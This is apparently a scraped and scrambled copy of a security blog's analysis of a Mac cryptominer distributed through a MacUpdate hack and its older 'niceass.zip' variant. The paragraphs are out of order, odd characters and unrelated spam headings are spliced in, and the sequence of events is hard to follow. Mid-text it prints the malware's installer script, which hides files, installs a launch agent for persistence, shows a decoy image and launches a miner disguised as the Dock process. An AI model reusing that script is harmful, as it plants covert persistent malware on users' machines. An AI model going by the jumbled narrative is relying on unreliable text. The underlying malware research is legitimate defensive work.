Dock will then suck up as much CPU time as it can to mine the Monero cryptocurrency.
Finally, the malicious Dock process is launched, passing in what appears to be an erroneous email address as the username to log in to Minergate. That file is then opened in Preview (ow, my eyes!) to cover up the fact that what was opened wasn’t just an image file. Next, the script cleans up a bit and replaces the ass.jpg file with the ass.jpg file from inside the Apple folder. (I’m not sure why it wasn’t distributed with this name in the first place, which would have been far less suspicious.) Next, it moves the various components out of the niceass folder and into the desired locations. The first step is to rename temp.app to “.tmp”, which hides it from view thanks to the initial period in the name. If it’s anywhere else, or if you removed the broken temp.app, the malware will fail completely. nohup mv ~/Downloads/niceass/temp.app ~/Downloads/niceass/.tmpmv ~/Downloads/niceass/.tmp/Apple ~/Library &mkdir -p ~/Library/LaunchAgents &mv ~/Library/Apple/.plist ~/Library/LaunchAgents &launchctl load -w ~/Library/LaunchAgents/.plist &rm -rf ~/Downloads/niceass/.tmp &rm ~/Downloads/niceass/ass.jpg &mv ~/Library/Apple/ass.jpg ~/Downloads/niceass &open -a Preview ~/Downloads/niceass/ass.jpg &~/Library/Apple/Dock -user -xmr &killall TerminalĪs we can see, this script assumes it will be run from within the niceass folder, which in turn must be in the Downloads folder. What about the first ass.jpg file, located outside the temp.app bundle? In what I bet is not at all surprising to anyone, it turns out it’s not actually a JPEG file.
#A better finder rename macupdate code
plist fileĪn executable named “Dock” (the same name as the Apple process that manages the Dock)Ī Frameworks folder containing some external framework code that must be needed by the Dock executableĬlearly, this isn’t an app, but some kind of naughtiness is planned. They are:Īn “ass.jpg” image (which you’re really better off not seeing)Ī file named “.plist” which is a launch agent. However, the contents are nonetheless intriguing. Decompressing the file resulted in a folder with two files: an image file called “ass.jpg” and an apparently broken application named “temp.”Īs indicated by the Finder, the “temp” application does not work at all, and on inspection, it didn’t even have the right internal structure to be a macOS app. These searches, called “retrohunts,” don’t always turn up much, but in this case we struck gold, finding no less than 23 older variants of this malware! The oldest of these was a file named “niceass.zip” (nice name). As we usually do when looking into new malware, we did some searches through the website VirusTotal-a massive crowd-sourced malware repository -to see if we could find any other variants. The malware delivered by the MacUpdate hack appears to be the culmination of something that has been around since at least early October of last year. Since then, we’ve been doing some digging and found that this isolated incident was just the tip of the iceberg.
#A better finder rename macupdate mac
On February 1, a new Mac cryptominer was discovered being distributed via a hack of the MacUpdate website.
New Mac cryptominer has 23 older variants
0 kommentar(er)
